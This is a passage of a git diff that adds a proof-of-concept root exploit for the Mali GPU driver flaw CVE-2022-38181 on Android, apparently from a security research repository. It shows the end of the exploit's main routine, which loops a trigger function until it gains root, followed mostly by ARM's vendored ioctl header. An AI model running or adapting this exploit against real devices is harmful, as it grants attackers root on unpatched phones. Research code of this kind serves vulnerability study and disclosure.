0x1000, 100, 0); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + int flush_idx = 0; + for (int i = 0; i < 10; i++) { + if(!trigger(mali_fd, mali_fd2, &flush_idx)) { + LOG("uid: %d euid %d", getuid(), geteuid()); + return 0; + } + } + return -1; +} +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h b/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h new file mode 100644 index 0000000..3b61e20 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali.h @@ -0,0 +1,1060 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_JM_IOCTL_H_ +#define _UAPI_KBASE_JM_IOCTL_H_ + +#include +#include + +/* + * 11.1: + * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags + * 11.2: + * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED, + * which some user-side clients prior to 11.2 might fault if they received + * them + * 11.3: + * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and + * KBASE_IOCTL_STICKY_RESOURCE_UNMAP + * 11.4: + * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET + * 11.5: + * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD) + * 11.6: + * - Added flags field to base_jit_alloc_info structure, which can be used to + * specify pseudo chunked tiler alignment for JIT allocations. + * 11.7: + * - Removed UMP support + * 11.8: + * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags + * 11.9: + * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY + * under base_mem_alloc_flags + * 11.10: + * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for + * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations + * with one softjob. + * 11.11: + * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags + * 11.12: + * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS + * 11.13: + * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT + * 11.14: + * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set + * under base_mem_alloc_flags + * 11.15: + * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags. + * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be + * passed to mmap(). + * 11.16: + * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf. + * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for + * dma-buf. Now, buffers are mapped on GPU when first imported, no longer + * requiring external resource or sticky resource tracking. UNLESS, + * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled. + * 11.17: + * - Added BASE_JD_REQ_JOB_SLOT. + * - Reused padding field in base_jd_atom_v2 to pass job slot number. + * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO + * 11.18: + * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags + * 11.19: + * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified. + * 11.20: + * - Added new phys_pages member to kbase_ioctl_mem_jit_init for + * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2 + * (replacing '_OLD') and _11_5 suffixes + * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in + * base_jd_atom_v2. It must currently be initialized to zero. + * - Added heap_info_gpu_addr to base_jit_alloc_info, and + * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's + * flags member. Previous variants of this structure are kept and given _10_2 + * and _11_5 suffixes. + * - The above changes are checked for safe values in usual builds + * 11.21: + * - v2.0 of mali_trace debugfs file, which now versions the file separately + * 11.22: + * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2. + * KBASE_IOCTL_JOB_SUBMIT supports both in parallel. + * 11.23: + * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify + * the physical memory backing of JIT allocations. This was not supposed + * to be a valid use case, but it was allowed by the previous implementation. + * 11.24: + * - Added a sysfs file 'serialize_jobs' inside a new sub-directory + * 'scheduling'. + * 11.25: + * - Enabled JIT pressure limit in base/kbase by default + * 11.26 + * - Added kinstr_jm API + * 11.27 + * - Backwards compatible extension to HWC ioctl. + * 11.28: + * - Added kernel side cache ops needed hint + * 11.29: + * - Reserve ioctl 52 + * 11.30: + * - Add a new priority level BASE_JD_PRIO_REALTIME + * - Add ioctl 54: This controls the priority setting. + * 11.31: + * - Added BASE_JD_REQ_LIMITED_CORE_MASK. + * - Added ioctl 55: set_limited_core_count. + */ +#define BASE_UK_VERSION_MAJOR 11 +#define BASE_UK_VERSION_MINOR 31 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + + +/** + * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel + * + * @addr: Memory address of an array of struct base_jd_atom_v2 or v3 + * @nr_atoms: Number of entries in the array + * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom) + */ +struct kbase_ioctl_job_submit { + __u64 addr; + __u32 nr_atoms; + __u32 stride; +}; + +#define KBASE_IOCTL_JOB_SUBMIT \ + _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit) + +#define KBASE_IOCTL_POST_TERM \ + _IO(KBASE_IOCTL_TYPE, 4) + +/** + * struct kbase_ioctl_soft_event_update - Update the status of a soft-event + * @event: GPU address of the event which has been updated + * @new_status: The new status to set + * @flags: Flags for future expansion + */ +struct kbase_ioctl_soft_event_update { + __u64 event; + __u32 new_status; + __u32 flags; +}; + +#define KBASE_IOCTL_SOFT_EVENT_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update) + +/** + * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for + * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the + * kernel + * + * @size: The size of the `struct kbase_kinstr_jm_atom_state_change` + * @version: Represents a breaking change in the + * `struct kbase_kinstr_jm_atom_state_change` + * @padding: Explicit padding to get the structure up to 64bits. See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + * + * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the + * end of the structure that older user space might not understand. If the + * `version` is the same, the structure is still compatible with newer kernels. + * The `size` can be used to cast the opaque memory returned from the kernel. + */ +struct kbase_kinstr_jm_fd_out { + __u16 size; + __u8 version; + __u8 padding[5]; +}; + +/** + * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor + * + * @count: Number of atom states that can be stored in the kernel circular + * buffer. Must be a power of two + * @padding: Explicit padding to get the structure up to 64bits. See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + */ +struct kbase_kinstr_jm_fd_in { + __u16 count; + __u8 padding[6]; +}; + +union kbase_kinstr_jm_fd { + struct kbase_kinstr_jm_fd_in in; + struct kbase_kinstr_jm_fd_out out; +}; + +#define KBASE_IOCTL_KINSTR_JM_FD \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd) + + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. + */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection + * @dump_buffer: GPU address to write counters to + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + */ +struct kbase_ioctl_hwcnt_enable { + __u64 dump_buffer; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_ENABLE \ + _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable) + +#define KBASE_IOCTL_HWCNT_DUMP \ + _IO(KBASE_IOCTL_TYPE, 10) + +#define KBASE_IOCTL_HWCNT_CLEAR \ + _IO(KBASE_IOCTL_TYPE, 11) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. + */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. + */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + _IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. + * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... + * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define 